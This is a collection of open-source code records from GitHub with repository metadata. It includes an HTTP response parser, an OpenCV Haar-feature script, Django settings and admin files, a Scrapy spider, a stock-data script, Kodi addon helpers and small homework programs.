app.</noscript><div id=\\"root\\"></div><script>!function(e){function r(r){for(var n,i,l=r[0],a=r[1],f=r[2],p=0,s=[];p<l.length;p++)i=l[p],Object.prototype.hasOwnProperty.call(o,i)&&o[i]&&s.push(o[i][0]),o[i]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(r);s.length;)s.shift()();return u.push.apply(u,f||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,l=1;l<t.length;l++){var a=t[l];0!==o[a]&&(n=!1)}n&&(u.splice(r--,1),e=i(i.s=t[0]))}return e}var n={},o={1:0},u=[];function i(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,i),t.l=!0,t.exports}i.m=e,i.c=n,i.d=function(e,r,t){i.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},i.r=function(e){\\"undefined\\"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:\\"Module\\"}),Object.defineProperty(e,\\"__esModule\\",{value:!0})},i.t=function(e,r){if(1&r&&(e=i(e)),8&r)return e;if(4&r&&\\"object\\"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,\\"default\\",{enumerable:!0,value:e}),2&r&&\\"string\\"!=typeof e)for(var n in e)i.d(t,n,function(r){return e[r]}.bind(null,n));return t},i.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(r,\\"a\\",r),r},i.o=function(e,r){return Object.prototype.hasOwnProperty.call(e,r)},i.p=\\"/\\";var l=this.webpackJsonpcovid19india=this.webpackJsonpcovid19india||[],a=l.push.bind(l);l.push=r,l=l.slice();for(var f=0;f<l.length;f++)r(l[f]);var c=a;t()}([])</script><script src=\\"/static/js/2.d8d2fdfc.chunk.js\\"></script><script src=\\"/static/js/main.ebb1defd.chunk.js\\"></script></body><script async src=\\"https://www.googletagmanager.com/gtag/js?id=UA-160698988-1\\"></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag(\\"js\\",new Date),gtag(\\"config\\",\\"UA-160698988-1\\")</script></html>\n\";\n";
| [
"noreply@github.com"
] | pavankumarmeruva.noreply@github.com |
e85d89a65920bd230348b41cb77c529402e4c82e | e7397ed7c8a79b1df463205ccf8358a183f51d68 | /venv/Lib/site-packages/aiourllib/response.py | 5bf90d796885539c1d25f4126078ade10641c607 | [] | no_license | yzx6151211/test | 7515a1e15fa16d1ba35a6af3afcd331e579427c0 | 59ffb77c240dc7e3f18d45e0d0863b9080c9fe40 | refs/heads/master | 2023-03-31T10:57:11.523739 | 2021-04-08T02:00:12 | 2021-04-08T02:00:12 | 355,732,822 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,672 | py | import asyncio
import collections
import json
import re
import gzip
import zlib
from . import (
exc,
utils)
class ResponseException(Exception):
    """Base class for errors raised while parsing/decoding an HTTP response."""
    pass
class TransferEncodingException(ResponseException):
    """Raised when the Transfer-Encoding header names an unsupported scheme."""
    pass
class ContentEncodingException(ResponseException):
    """Raised when the Content-Encoding header names an unsupported scheme."""
    pass
class Protocol(object):
    """Stateless parsing helpers for HTTP/1.x status lines and headers."""

    COLON = ':'
    HTTP = 'HTTP/'

    # Extracts the charset parameter from a Content-Type header value.
    REGEX_CHARSET = re.compile(r';\s*charset=([^;]*)', re.I)
    # Matches `token`, `token=value` or `token="quoted value"` directives;
    # group 2 is the quoted form, group 3 the bare form.
    REGEX_TOKEN = re.compile(
        r'([a-zA-Z][a-zA-Z_-]*)\s*(?:=(?:"([^"]*)"|'
        r'([^ \t",;]*)))?')

    @classmethod
    def parse_status(cls, status):
        """Strip the HTTP-version prefix: 'HTTP/1.1 200 OK' -> '200 OK'.

        A line that does not start with 'HTTP/' is returned unchanged.
        """
        if status.startswith(cls.HTTP):
            http_version, status_code, status_text = status.split(None, 2)
            status = '{} {}'.format(
                utils.smart_text(status_code),
                utils.smart_text(status_text))
        return status

    @classmethod
    def parse_status_code(cls, status):
        """Return the numeric code from an already-parsed status ('200 OK' -> 200)."""
        return int(status.split()[0])

    @classmethod
    def parse_charset(cls, header, charset):
        """Return the charset declared in *header*, or the fallback *charset*."""
        match = cls.REGEX_CHARSET.search(utils.smart_text(header))
        if match:
            charset = match.group(1)
        return charset

    @classmethod
    def parse_cache_control(cls, header):
        """Parse a Cache-Control header into {directive: value}.

        Boolean directives (public, no-store, ...) map to None; valued
        directives (max-age, ...) keep their value, converted to int when
        the value is all digits.  Unrecognised directives are dropped.
        """
        header = utils.smart_text(header)
        # First pass: collect every token and its (possibly quoted) value.
        cache = {}
        for match in cls.REGEX_TOKEN.finditer(header):
            name = match.group(1)
            value = match.group(2) or match.group(3) or None
            if value and value.isdigit():
                value = int(value)
            cache[name] = value

        cache_control = {}
        # Boolean-only directives: presence matters, value is always None.
        for n in [
            'public',
            'no-store',
            'no-transform',
            'must-revalidate',
            'proxy-revalidate',
        ]:
            if n not in cache:
                continue
            cache_control[n] = None

        # Directives that may carry a value.
        for n, v in cache.items():
            if n not in [
                'private',
                'no-cache',
                'max-age',
                's-maxage',
                'stale-while-revalidate',
                'stale-if-error',
            ]:
                continue
            cache_control[n] = v

        return cache_control
class Response(object):
    """HTTP response: reads status/headers from a connection, decodes the body.

    Fixes vs. the original:
    - `_read_deflate` / `_read_gzip` called the nonexistent
      `self.read_identity()` (AttributeError at runtime); they now call
      `self._read_identity()`.
    - `_content_type` / `_charset` were initialized to their truthy class
      defaults, so the lazy properties never consulted the actual
      Content-Type header; they now start as None and fall back to the
      class defaults only when no header is present.
    """

    PROTOCOL = Protocol
    CONTENT_TYPE = 'text/html'  # fallback when no Content-Type header exists
    CHARSET = 'UTF-8'           # fallback when no charset parameter exists

    def __init__(
        self,
        connection,
        status=None,
        headers=None,
    ):
        self.connection = connection
        self.status = status
        self.headers = headers

        # Header-derived attributes, computed lazily by the properties below.
        self._status_code = None
        self._content_encoding = None
        self._content_length = None
        self._content_type = None
        self._charset = None
        self._cache_control = None
        self._transfer_encoding = None
        self._content = None

    @property
    def status_code(self):
        """Numeric HTTP status code parsed from the status line."""
        if not self._status_code:
            self._status_code = self.PROTOCOL.parse_status_code(self.status)
        return self._status_code

    @property
    def content_length(self):
        """Value of the Content-Length header as int, or None if absent."""
        if (not self._content_length) and self.has_header('Content-Length'):
            self._content_length = int(self.get_header('Content-Length'))
        return self._content_length

    @property
    def content_type(self):
        """Content-Type header value, defaulting to CONTENT_TYPE."""
        if not self._content_type:
            if self.has_header('Content-Type'):
                self._content_type = \
                    utils.smart_text(self.get_header('Content-Type'))
            else:
                self._content_type = self.CONTENT_TYPE
        return self._content_type

    @property
    def content_encoding(self):
        """Content-Encoding header value, defaulting to 'identity'."""
        if not self._content_encoding:
            if self.has_header('Content-Encoding'):
                self._content_encoding = \
                    utils.smart_text(self.get_header('Content-Encoding'))
            else:
                self._content_encoding = 'identity'
        return self._content_encoding

    @property
    def transfer_encoding(self):
        """Transfer-Encoding header value, defaulting to 'identity'."""
        if not self._transfer_encoding:
            if self.has_header('Transfer-Encoding'):
                self._transfer_encoding = \
                    utils.smart_text(self.get_header('Transfer-Encoding'))
            else:
                self._transfer_encoding = 'identity'
        return self._transfer_encoding

    @property
    def charset(self):
        """Charset from the Content-Type header, defaulting to CHARSET."""
        if not self._charset:
            self._charset = self.PROTOCOL.parse_charset(
                self.content_type, self.CHARSET)
        return self._charset

    @property
    def cache_control(self):
        """Parsed Cache-Control directives, or None if the header is absent."""
        if (not self._cache_control) and self.has_header('Cache-Control'):
            self._cache_control = self.PROTOCOL.parse_cache_control(
                self.get_header('Cache-Control'))
        return self._cache_control

    def get_header(self, header):
        """Return the value of *header*, matched case-insensitively."""
        mapping = {h.lower(): h for h in self.headers}
        header = header.lower()
        if header in mapping:
            return self.headers[mapping[header]]

    def has_header(self, header):
        """Return True if *header* is present (case-insensitive)."""
        mapping = {h.lower(): h for h in self.headers}
        header = header.lower()
        return header in mapping

    async def read_coro(self, coro):
        """Await *coro* bounded by the connection's read timeout."""
        try:
            return await asyncio.wait_for(coro, self.connection.read_timeout)
        except asyncio.TimeoutError:
            raise exc.ReadTimeout

    async def read_headers(self):
        """Read and parse the status line and all response headers."""
        coro = self.connection.socket.reader.readline()
        status = (await self.read_coro(coro)).strip()
        status = utils.smart_text(status, 'latin-1')
        self.status = self.PROTOCOL.parse_status(status)

        self.headers = collections.OrderedDict()
        while True:
            coro = self.connection.socket.reader.readline()
            line = (await self.read_coro(coro)).strip()
            line = utils.smart_text(line, 'latin-1')
            if not line:  # blank line terminates the header section
                break
            try:
                header, value = line.split(self.PROTOCOL.COLON, 1)
            except ValueError:
                raise ValueError('Bad header line: {}'.format(
                    utils.smart_text(line)))
            header = utils.smart_text(header.strip(), 'latin-1')
            value = utils.smart_text(value.strip(), 'latin-1')
            self.headers[header] = value

    def read(self):
        """Return the coroutine that reads the raw body per Transfer-Encoding."""
        if self.transfer_encoding == 'chunked':
            return self._read_chunks()
        elif self.transfer_encoding == 'deflate':
            return self._read_deflate()
        elif self.transfer_encoding == 'gzip':
            return self._read_gzip()
        elif self.transfer_encoding == 'identity':
            return self._read_identity()
        else:
            raise TransferEncodingException(self.transfer_encoding)

    async def _read_chunks(self):
        """Read a chunked body: <hex size>\\r\\n<data>\\r\\n ... until size 0."""
        content = b''
        while True:
            coro = self.connection.socket.reader.readline()
            chunk_size = await self.read_coro(coro)
            chunk_size = chunk_size.strip()
            if not chunk_size:
                break
            chunk_size = int(chunk_size, base=16)

            coro = self.connection.socket.reader.readexactly(chunk_size)
            r = await self.read_coro(coro)
            if not r:
                break
            content += r
            # Consume the CRLF that trails every chunk.
            coro = self.connection.socket.reader.readline()
            await self.read_coro(coro)
        return content

    async def _read_deflate(self):
        # Fix: the original called the nonexistent self.read_identity().
        return zlib.decompress(await self._read_identity())

    async def _read_gzip(self):
        # Fix: the original called the nonexistent self.read_identity().
        return gzip.decompress(await self._read_identity())

    async def _read_identity(self):
        """Read exactly Content-Length bytes from the socket."""
        content = b''
        while len(content) < self.content_length:
            chunk_size = self.content_length - len(content)
            coro = self.connection.socket.reader.read(chunk_size)
            r = await self.read_coro(coro)
            if r:
                content += r
            else:  # connection closed early
                break
        return content

    async def read_content(self):
        """Read the body once and decode it per Content-Encoding; cached."""
        if not self._content:
            content = await self.read()
            if self.content_encoding == 'deflate':
                content = zlib.decompress(content)
            elif self.content_encoding == 'gzip':
                content = gzip.decompress(content)
            elif self.content_encoding == 'identity':
                pass
            else:
                raise ContentEncodingException(self.content_encoding)
            self._content = content
        return self._content

    async def read_text(self):
        """Return the body decoded as text using the response charset."""
        content = await self.read_content()
        return content.decode(self.charset)

    async def read_json(self):
        """Return the body parsed as JSON."""
        content = await self.read_text()
        return json.loads(content)

    def close(self):
        """Close the underlying connection's writer."""
        self.connection.socket.writer.close()
| [
"523882246@qq.com"
] | 523882246@qq.com |
a3ae2ee8ebc61a3af3ad97aa79f0e6bfa8f005c2 | fe002077b2e8135e322a7939b3a7be27473650f9 | /opencv_python/0820.py | ac29e6d01bdefc7653953af0012e242e004654bb | [] | no_license | leekyungjin333/LinuxGUIex | 94d903b39c32f1a0f6d0396c5710a28edf2a39d7 | 6972cfff681e8d6568f41069c99c0394198618fe | refs/heads/master | 2020-07-16T11:12:30.785506 | 2019-09-06T04:13:20 | 2019-09-06T04:13:20 | 205,778,526 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,618 | py | # 0820.py
import cv2
import numpy as np
#1
def rectSum(sumImage, rect):
    """Sum of the pixels inside rect=(x, y, w, h) using the integral image.

    `sumImage` must be an integral image with one extra leading row and
    column (as produced by cv2.integral).
    """
    x, y, w, h = rect
    top_left = sumImage[y, x]
    top_right = sumImage[y, x + w]
    bottom_left = sumImage[y + h, x]
    bottom_right = sumImage[y + h, x + w]
    # Standard inclusion-exclusion over the four corners.
    return top_left + bottom_right - top_right - bottom_left
def compute_Haar_feature1(sumImage):
    """All two-rectangle horizontal-pair Haar features: left sum minus right sum.

    Returns a list of [type, x, y, w, h, value] entries with type == 1.
    """
    height = sumImage.shape[0] - 1
    width = sumImage.shape[1] - 1
    features = []
    for y in range(height):
        for x in range(width):
            for h in range(1, height - y + 1):
                for w in range(1, (width - x) // 2 + 1):
                    left = rectSum(sumImage, (x, y, w, h))
                    right = rectSum(sumImage, (x + w, y, w, h))
                    features.append([1, x, y, w, h, left - right])
    return features
def compute_Haar_feature2(sumImage):
    """All two-rectangle vertical-pair Haar features: bottom sum minus top sum.

    Returns a list of [type, x, y, w, h, value] entries with type == 2.
    """
    height = sumImage.shape[0] - 1
    width = sumImage.shape[1] - 1
    features = []
    for y in range(height):
        for x in range(width):
            for h in range(1, (height - y) // 2 + 1):
                for w in range(1, width - x + 1):
                    top = rectSum(sumImage, (x, y, w, h))
                    bottom = rectSum(sumImage, (x, y + h, w, h))
                    features.append([2, x, y, w, h, bottom - top])
    return features
def compute_Haar_feature3(sumImage):
    """Type-3 (three-rectangle, horizontal) Haar features.

    Score is outer sums minus the middle: s1 - s2 + s3.
    Each entry is [3, x, y, w, h, score].
    """
    rows = sumImage.shape[0] - 1
    cols = sumImage.shape[1] - 1
    return [[3, x, y, w, h,
             rectSum(sumImage, (x, y, w, h))
             - rectSum(sumImage, (x + w, y, w, h))
             + rectSum(sumImage, (x + 2 * w, y, w, h))]
            for y in range(rows)
            for x in range(cols)
            for h in range(1, rows - y + 1)
            for w in range(1, (cols - x) // 3 + 1)]
def compute_Haar_feature4(sumImage):
    """Type-4 (three-rectangle, vertical) Haar features.

    Score is outer sums minus the middle: s1 - s2 + s3.
    Each entry is [4, x, y, w, h, score].
    """
    rows = sumImage.shape[0] - 1
    cols = sumImage.shape[1] - 1
    return [[4, x, y, w, h,
             rectSum(sumImage, (x, y, w, h))
             - rectSum(sumImage, (x, y + h, w, h))
             + rectSum(sumImage, (x, y + 2 * h, w, h))]
            for y in range(rows)
            for x in range(cols)
            for h in range(1, (rows - y) // 3 + 1)
            for w in range(1, cols - x + 1)]
def compute_Haar_feature5(sumImage):
    """Type-5 (four-rectangle, checkerboard) Haar features.

    Score is the diagonal sums minus the anti-diagonal sums:
    upper-left - upper-right - lower-left + lower-right.
    Each entry is [5, x, y, w, h, score].
    """
    rows = sumImage.shape[0] - 1
    cols = sumImage.shape[1] - 1
    features = []
    for top in range(rows):
        for left in range(cols):
            for h in range(1, (rows - top) // 2 + 1):
                for w in range(1, (cols - left) // 2 + 1):
                    ul = rectSum(sumImage, (left, top, w, h))
                    ur = rectSum(sumImage, (left + w, top, w, h))
                    ll = rectSum(sumImage, (left, top + h, w, h))
                    lr = rectSum(sumImage, (left + w, top + h, w, h))
                    features.append([5, left, top, w, h, ul - ur - ll + lr])
    return features
#2
# Load a 24x24 face crop, build its integral image, then enumerate every
# Haar feature type and report the counts (classic Viola-Jones totals).
gray = cv2.imread('./data/lenaFace24.jpg', cv2.IMREAD_GRAYSCALE) # 24 x 24
gray_sum = cv2.integral(gray)
f1 = compute_Haar_feature1(gray_sum)
n1 = len(f1)
print('len(f1)=',n1)
for i, a in enumerate(f1[:2]):
    print('f1[{}]={}'.format(i, a))
#3
f2 = compute_Haar_feature2(gray_sum)
n2 = len(f2)
print('len(f2)=',n2)
for i, a in enumerate(f2[:2]):
    print('f2[{}]={}'.format(i, a))
#4
f3 = compute_Haar_feature3(gray_sum)
n3 = len(f3)
print('len(f3)=',n3)
for i, a in enumerate(f3[:2]):
    print('f3[{}]={}'.format(i, a))
#5
f4 = compute_Haar_feature4(gray_sum)
n4 = len(f4)
print('len(f4)=',n4)
for i, a in enumerate(f4[:2]):
    print('f4[{}]={}'.format(i, a))
#6
f5 = compute_Haar_feature5(gray_sum)
n5 = len(f5)
print('len(f5)=',n5)
for i, a in enumerate(f5[:2]):
    print('f5[{}]={}'.format(i, a))
# Grand total over all five feature families.
print('total features =', n1+n2+n3+n4+n5)
| [
"leekyungjin333@users.noreply.github.com"
] | leekyungjin333@users.noreply.github.com |
21eebbc0b1756a0f6d929b7deaf6b26650c96230 | 6445533255d69bd5fe3ea80fdb2b10c14ef03f70 | /Clinic_Essentials/apps.py | 6f44fd8d440aa45c13047df5101b085c36277d45 | [] | no_license | 17shashank17/Clinic | ed37458bb059f1691ccbbdd57a4364899e93c2fc | 3b0647600a6a0b826635d8e3c7b958b749732d6e | refs/heads/master | 2020-09-30T19:42:28.434286 | 2019-12-11T12:19:04 | 2019-12-11T12:19:04 | 227,359,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | from django.apps import AppConfig
class ClinicEssentialsConfig(AppConfig):
    """Django application configuration for the Clinic_Essentials app."""
    name = 'Clinic_Essentials'
| [
"17shashank17@gmail.com"
] | 17shashank17@gmail.com |
0d8b96bf89c8d646fecdd498d7573ec350c21dbf | 966edfa4539288983c39c7dfc2ad003fa608ee4e | /rolling_ops (1).py | 1265f499bfa1fc06835da61941be289f2b4e0513 | [] | no_license | btindol178/Algorithmic-Trading | ee2b067d7476dadd0dc6d0af765a8a56924a5dae | 99dbad5ec3d496d26dddacd6f5d155921c3c3ea4 | refs/heads/main | 2023-05-04T10:01:51.765390 | 2021-06-01T16:06:05 | 2021-06-01T16:06:05 | 346,842,518 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,430 | py | # =============================================================================
# Import OHLCV data and perform basic data operations
# Author : Mayank Rasu (http://rasuquant.com/wp/)
# Please report bug/issues in the Q&A section
# =============================================================================
# Import necesary libraries
import datetime as dt
import yfinance as yf
import pandas as pd
# Download historical data for required stocks
tickers = ["MSFT","AMZN","AAPL","CSCO","IBM","FB"]
start = dt.datetime.today()-dt.timedelta(3650)
end = dt.datetime.today()
close_prices = pd.DataFrame() # empty dataframe which will be filled with closing prices of each stock
# looping over tickers and creating a dataframe with close prices
for ticker in tickers:
    close_prices[ticker] = yf.download(ticker,start,end)["Adj Close"]
close_prices.fillna(method='bfill',axis=0,inplace=True) #replace NaN values using backfill method
close_prices.dropna(axis=0,inplace=True) #drop row containing any NaN value
daily_return = close_prices.pct_change() # creates a dataframe with the daily return for each stock
# Rolling mean and standard deviation.
# NOTE(review): the four expressions below compute rolling/EWM statistics but
# the results are not assigned to anything — they are demonstration-only and
# are discarded. Assign them to variables if the values are actually needed.
daily_return.rolling(window=20).mean() # simple moving average
daily_return.rolling(window=20).std()
daily_return.ewm(span=20,min_periods=20).mean() # exponential moving average
daily_return.ewm(span=20,min_periods=20).std()
"noreply@github.com"
] | btindol178.noreply@github.com |
bf00d39dfbcf3248fb20c2c1c1e443dd5b17008f | 9b4b3ca4f48c170c33575af59be737208a23389c | /Forum/Forum/forumapp/admin.py | 6dd93e2f7ad6a19d034a2c74b08d92edb08bae25 | [] | no_license | DanielStankovych/fifth-project | b54e787f1c3016a3fafd59941d874bd2b193dc3a | 0415401681fc1d49d02a87c7fc26488176f91d7e | refs/heads/master | 2023-08-22T17:45:18.261348 | 2019-11-14T10:52:06 | 2019-11-14T10:52:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | from django.contrib import admin
from . import models
from .models import Category
from .models import Post
from .models import Profile
# Expose the forum models in the Django admin interface.
for model in (Post, Category, Profile):
    admin.site.register(model)
| [
"noreply@github.com"
] | DanielStankovych.noreply@github.com |
d25ebbe6badfd094abd005663fc100b84313ce48 | 81829702fe531aa34a1a39d209cd9a27ad717133 | /fiubauth/settings.py | 638aea82d0c7e49c4d695d6427a6e53363622348 | [
"MIT"
] | permissive | MartinCura/fiubauth | 3b2fd9d798baf47a88382c7d76b26996d30740d8 | 61e344082956a56c76c0e9d68c72778e90cd1f93 | refs/heads/master | 2022-02-08T15:56:00.195792 | 2021-06-09T19:49:05 | 2021-06-09T19:49:05 | 171,236,958 | 0 | 0 | MIT | 2022-01-24T15:44:52 | 2019-02-18T07:39:14 | Python | UTF-8 | Python | false | false | 3,302 | py | """
Django settings for fiubauth project.
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9v2bo67akl(hv0leq1dogn4+qi@z8m-f4f46y+t8@qrso)90js'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'fiuba.apps.FiubaConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'oidc_provider',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
#'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'fiubauth.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['fiubauth/templates/'], # why was this necessary?
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'fiubauth.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql', # .postgresql_psycopg2
'NAME': 'fiubauth_db',
'USER': 'fiubauth',
'PASSWORD': 'fiupass',
'HOST': 'localhost',
'PORT': '', # '5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'es-AR' # 'en-us'
TIME_ZONE = 'America/Argentina/Buenos_Aires'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
# Other
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/accounts/login'
# OIDC Provider
OIDC_SESSION_MANAGEMENT_ENABLE = True
| [
"martincura@gmail.com"
] | martincura@gmail.com |
3d2c1cf2f0fd2003ca03ac47c8cb4bc4f252c788 | e906dfa9290ed6d43f0d99898e6714f9e2712daa | /Problem001.py | 8aca21d55ce3a32342321f93f5c120afaa71e010 | [] | no_license | onp/ProjectEuler-py | 9fa80ab0e85ac29f04c05f63a367b49e50aa5aa8 | 3fa17a9b7d154ba48b04f9ac6884df1a3fb812be | refs/heads/master | 2021-01-23T17:30:51.284281 | 2014-03-12T23:40:01 | 2014-03-12T23:40:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py | # Project Euler Problem #1
# Multiples of 3 and 5
''' If we list all the natural numbers below 10 that are multiples of 3 or 5,
we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000.
'''
a= [x for x in range(1000) if (x%3==0)|(x%5==0)]
print(sum(a))
# A= 233168 | [
"a.more.reliable.source@gmail.com"
] | a.more.reliable.source@gmail.com |
96fd35a1314f73aa37ac76aef4bb32df8cc4fe3a | cd052f960846ea33e22abdded3106fb492f16c31 | /爬虫项目/code09/ITCast/ITCast/spiders/itcast.py | ed76197004fcb89ff0c9826496a95830942d4f4d | [] | no_license | byst4nder/his_spider | 2d96457b70894c36506e8061d8a3201ac337a5d0 | a51e31acff41292e568ac22b0e213e6cb48218fa | refs/heads/master | 2020-07-21T12:06:28.952083 | 2019-09-06T14:25:58 | 2019-09-06T14:25:58 | 206,857,595 | 1 | 0 | null | 2019-09-06T19:04:02 | 2019-09-06T19:04:02 | null | UTF-8 | Python | false | false | 1,322 | py | # coding:utf-8
# 可以通过命令创建爬虫
# #scrapy genspider itcast itcast.cn
import scrapy
from ..items import ItcastItem
class ItcastSpider(scrapy.Spider):
name = "itcast"
allowed_domains = ["itcast.cn"]
start_urls = ["http://www.itcast.cn/channel/teacher.shtml"]
def parse(self, response):
node_list = response.xpath("//div[@class='li_txt']")
# 迭代取出每个老师信息,并保存在item中
for node in node_list:
item = ItcastItem()
item['name'] = node.xpath("./h3/text()").extract_first()
item['title'] = node.xpath("./h4/text()").extract_first()
item['info'] = node.xpath("./p/text()").extract_first()
yield item
# 1. scrapy crawl itcast -o itcast.json (csv、xml、jl)
# 2. 如果需要将数据存储到scrpay不支持的格式里,比如数据库等,就必须通过管道实现
#engine.py
# Engine里的每次for迭代 parse() 方法,用来处理一个response响应提取的数据(请求、item)
# for result in spider.parse(response):
# if isinstance(result, scrapy.Item):
# pipeline.process_item(resutl, spider)
# elif isinstance(result, scrapy.Request):
# scheduler.add_request(result)
| [
"mac@macdeMacBook-Pro.local"
] | mac@macdeMacBook-Pro.local |
e8dce776e101aefc99de1b30282da6ad07504850 | 53dfc1a19373bd068fdc1673e1542867836ba985 | /test.py | 78d52ad3045bf8c2c785c812387af9ea4c8db660 | [] | no_license | mivanrm/UDP-file-transfer | efd3ea4036d747436642220eb8b86f2fea6e641f | 7e44ae323e7213ccbfde6b71d1b145a86ad48553 | refs/heads/master | 2022-02-26T20:53:43.442329 | 2019-09-26T16:34:07 | 2019-09-26T16:34:07 | 210,993,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35 | py | f=open("abc.txt","rb")
f.__sizeof__ | [
"mivanrm12@gmail.com"
] | mivanrm12@gmail.com |
d17b309bad63ad2a121a0fc94c0e27562b2357a8 | 094fe32f3144ee03d53df10ae3e8518f372d6b62 | /service.prb-clean/resources/lib/commontasks.py | 812457d26b2a7dcd5a653b0159269762f34d0c3b | [] | no_license | PhantomRaspberryBlower/repository.prb-entertainment-pack | 0b72ad49b4183c8b45b704295beadf09831f23a3 | 02e103228ad86aee3d8cef6fac3806c1f3605f45 | refs/heads/master | 2022-06-19T04:14:07.841398 | 2022-05-17T09:53:21 | 2022-05-17T09:53:21 | 192,784,863 | 10 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | #!/bin/python
import os
import xbmc
import xbmcgui
import shutil
import re
'''
Written by: Phantom Raspberry Blower
Date: 21-08-2017
Description: Common Tasks for Addons
'''
INVALID_FILENAME_CHARS = '\/:*?"<>|'
def remove_tree(dir_path):
    """Recursively delete *dir_path*, silently ignoring filesystem errors."""
    shutil.rmtree(dir_path, ignore_errors=True)
def xbmc_version():
    """Return the running Kodi/XBMC version (first four characters of the
    build string) as a float."""
    build = xbmc.getInfoLabel("System.BuildVersion")
    return float(build[:4])
def notification(title, message, ms, nart):
    """Show a Kodi popup notification via the XBMC builtin command."""
    args = ",".join([title, message, ms, nart])
    xbmc.executebuiltin("XBMC.notification(" + args + ")")
def message(message, title):
    """Display a modal OK dialog with the given title and message."""
    xbmcgui.Dialog().ok(title, message)
def read_from_file(path):
    """Return the contents of *path* as a string, or None if it cannot
    be opened or read.

    Fixes over the original: the file handle is now closed even when
    read() fails (context manager), and the bare `except` is narrowed to
    I/O errors so programming errors are no longer silently swallowed.
    """
    try:
        with open(path, 'r') as f:
            return f.read()
    except (IOError, OSError):
        return None
def write_to_file(path, content, append=False):
    """Write (or append, when *append* is True) *content* to *path*.

    Returns True on success, False if the file could not be written.

    Fixes over the original: the handle is closed even if write() fails
    (context manager), and the bare `except` is narrowed to I/O errors.
    """
    mode = 'a' if append else 'w'
    try:
        with open(path, mode) as f:
            f.write(content)
        return True
    except (IOError, OSError):
        return False
def regex_from_to(text, from_string, to_string, excluding=True):
    """Case-insensitively return the text found between *from_string* and
    *to_string* in *text*.

    When *excluding* is True only the text between the two markers is
    returned; otherwise the markers are included in the result.
    """
    if excluding:
        pattern = "(?i)" + from_string + r"([\S\s]+?)" + to_string
    else:
        pattern = "(?i)(" + from_string + r"[\S\s]+?" + to_string + ")"
    return re.search(pattern, text).group(1)
| [
"jasonbulis@hotmail.com"
] | jasonbulis@hotmail.com |
ea5590f27ece0d76b627816b057ee992c98f014b | 5ed7df827c86692ce02d51580a2d1feeb409c087 | /Freshman Year/CS111/Problem Set 2/ps2pr4.py | 793d2d77e09d390c3dea883a7ea6d24177caed37 | [] | no_license | Aweirdanomaly/SchoolWork | 713d8cb9eaea66cc4042e0f638f3eee7c04493af | 9f4e97e7e56e22953bf097c131ca6b5555bfe6ee | refs/heads/main | 2023-02-13T18:45:03.970543 | 2021-01-08T08:10:11 | 2021-01-08T08:10:11 | 325,880,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 23 23:37:54 2019
@author: Carlos
"""
# Problem 4 part 1
def copy(s, n):
    """Return *s* concatenated with itself *n* times ('' when n <= 0)."""
    if n <= 0:
        return ''
    # Recursive step: n-1 copies followed by one more.
    return copy(s, n - 1) + s
#Problem 4 part 2
def compare(list1, list2):
    """Count positions i where list1[i] < list2[i], stopping at the end of
    the shorter list."""
    if not list1 or not list2:
        return 0
